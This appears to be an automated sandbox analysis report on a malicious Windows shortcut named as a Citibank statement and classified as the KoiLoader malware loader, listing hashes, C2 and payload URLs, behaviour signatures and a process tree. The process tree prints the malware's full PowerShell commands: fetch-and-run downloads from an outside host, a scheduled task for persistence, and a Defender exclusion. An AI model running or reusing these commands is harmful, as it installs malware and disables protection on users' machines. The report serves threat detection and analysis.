Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    137s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 10:37

General

  • Target

    citibank_feb_2025.lnk

  • Size

    1KB

  • MD5

    4faa35703e3c7a20143562b271ceca2f

  • SHA1

    2d87ff75eb532029ab63ed68971471589f28a847

  • SHA256

    7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926

  • SHA512

    ab0659b71b2a6593a288d1fe869f3615dea4eb3684df62670f1bfb38b342a8a529fa933ee78743aa162d474ffaad7b9e381f6c3186d2bed798fb27f3bfa09133

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php

exe.dropper

https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1

Extracted

Family

koiloader

C2

http://178.17.170.209/overglass.php

Attributes
  • payload_url

    https://www.centralelatterieti.com/wp-content/uploads/2020

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

  • Koiloader family
  • Detects KoiLoader payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\citibank_feb_2025.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('778ycf5h9kz2sm.js iagx9x77v'); $dwnf='Dow'+'nl'+'oadF'+'ile'; $b10frxwtardxmxv8j = New-Object Net.WebClient; $wsd = $b10frxwtardxmxv8j.DownloadString('https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/commendedtz4.php', '778ycf5h9kz2sm.js'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/caninusAXRu.php', 'iagx9x77v.js'); . ('scht'+'as'+'ks') /create /sc minute /mo 1 /f /tr ($wsd + $pdw) /tn iagx9x77v;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v" /tn iagx9x77v
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4876
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn iagx9x77v /f; wscript $env:programdata\iagx9x77v.js "
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn iagx9x77v /f
        3⤵
          PID:4448
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\iagx9x77v.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4516
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$tp=[Ref].Assembly.GetTypes();$ppa = 'https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php'; $dnl = $null; $ppb = 'https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1'; Foreach($tt in $tp) {if ($tt.Name -like '*m?iUt*s') {$c=$tt}}; $env:paths = '7z4FV088YZYK'; IEX(Invoke-WebRequest -UseBasicParsing $ppa); IEX(Invoke-WebRequest -UseBasicParsing $ppb)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5092
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4628
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:888
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5064
    • C:\Windows\System32\wscript.exe
      C:\Windows\System32\wscript.exe "C:\ProgramData\r5187cda7-fb47-4212-818b-591fd86b0f92r.js"
      1⤵
        PID:2088
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\r5187cda7-fb47-4212-818b-591fd86b0f92r.js"
        1⤵
          PID:4452

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\778ycf5h9kz2sm.js

          Filesize

          198B

          MD5

          af9f1f2076317c03e21d56367e638af4

          SHA1

          61c4f850591f851acd3108104ef14f0fe32f95a6

          SHA256

          70835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1

          SHA512

          c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c

        • C:\ProgramData\iagx9x77v.js

          Filesize

          1KB

          MD5

          fff94a4a4261834d74e2068f3c981b9a

          SHA1

          4b8c354b73716ae354c3592bb0f58db02700ad09

          SHA256

          4f69f820b068a83b17d30814738bb954304b5764ff9c02422245cd1252fd4601

          SHA512

          52f4d2b1b1a76a996e4e5b04306e381efaa2c62b2b1108999f053e2b330ba543a3de4a4a8ad17c2293203f7eaaa609cfdf4116f75226bfee5e48338ed7fcfc0f

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1bad2704664b4c1a190586ec492be65f

          SHA1

          1c98e6645c66774152c184d23f7a3178ce522e7b

          SHA256

          5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

          SHA512

          668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          50a8221b93fbd2628ac460dd408a9fc1

          SHA1

          7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

          SHA256

          46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

          SHA512

          27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eu1hynlv.chi.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/888-103-0x0000000008490000-0x00000000084E0000-memory.dmp

          Filesize

          320KB

        • memory/888-100-0x0000000007C20000-0x0000000007C42000-memory.dmp

          Filesize

          136KB

        • memory/888-104-0x0000000008580000-0x0000000008612000-memory.dmp

          Filesize

          584KB

        • memory/888-102-0x0000000008340000-0x000000000835A000-memory.dmp

          Filesize

          104KB

        • memory/888-101-0x00000000089C0000-0x0000000008F64000-memory.dmp

          Filesize

          5.6MB

        • memory/2092-2-0x00007FF8305F3000-0x00007FF8305F5000-memory.dmp

          Filesize

          8KB

        • memory/2092-14-0x00007FF8305F0000-0x00007FF8310B1000-memory.dmp

          Filesize

          10.8MB

        • memory/2092-13-0x00007FF8305F0000-0x00007FF8310B1000-memory.dmp

          Filesize

          10.8MB

        • memory/2092-19-0x00007FF8305F0000-0x00007FF8310B1000-memory.dmp

          Filesize

          10.8MB

        • memory/2092-12-0x00000233A4270000-0x00000233A4292000-memory.dmp

          Filesize

          136KB

        • memory/5064-88-0x0000000007CD0000-0x0000000007CD8000-memory.dmp

          Filesize

          32KB

        • memory/5064-84-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

          Filesize

          68KB

        • memory/5064-87-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

          Filesize

          104KB

        • memory/5064-86-0x0000000007BF0000-0x0000000007C04000-memory.dmp

          Filesize

          80KB

        • memory/5064-85-0x0000000007BE0000-0x0000000007BEE000-memory.dmp

          Filesize

          56KB

        • memory/5064-70-0x0000000070730000-0x000000007077C000-memory.dmp

          Filesize

          304KB

        • memory/5064-69-0x0000000006C90000-0x0000000006CC2000-memory.dmp

          Filesize

          200KB

        • memory/5064-80-0x0000000006BD0000-0x0000000006BEE000-memory.dmp

          Filesize

          120KB

        • memory/5064-81-0x0000000007880000-0x0000000007923000-memory.dmp

          Filesize

          652KB

        • memory/5064-82-0x0000000007A20000-0x0000000007A2A000-memory.dmp

          Filesize

          40KB

        • memory/5064-83-0x0000000007C30000-0x0000000007CC6000-memory.dmp

          Filesize

          600KB

        • memory/5092-35-0x0000000003300000-0x0000000003336000-memory.dmp

          Filesize

          216KB

        • memory/5092-57-0x00000000086E0000-0x00000000086ED000-memory.dmp

          Filesize

          52KB

        • memory/5092-55-0x0000000008640000-0x0000000008641000-memory.dmp

          Filesize

          4KB

        • memory/5092-54-0x0000000007F50000-0x00000000085CA000-memory.dmp

          Filesize

          6.5MB

        • memory/5092-53-0x0000000006CE0000-0x0000000006CFA000-memory.dmp

          Filesize

          104KB

        • memory/5092-52-0x0000000006910000-0x000000000695C000-memory.dmp

          Filesize

          304KB

        • memory/5092-51-0x00000000068E0000-0x00000000068FE000-memory.dmp

          Filesize

          120KB

        • memory/5092-49-0x00000000062E0000-0x0000000006634000-memory.dmp

          Filesize

          3.3MB

        • memory/5092-38-0x00000000059C0000-0x0000000005A26000-memory.dmp

          Filesize

          408KB

        • memory/5092-39-0x0000000005A30000-0x0000000005A96000-memory.dmp

          Filesize

          408KB

        • memory/5092-37-0x0000000005920000-0x0000000005942000-memory.dmp

          Filesize

          136KB

        • memory/5092-36-0x0000000005BB0000-0x00000000061D8000-memory.dmp

          Filesize

          6.2MB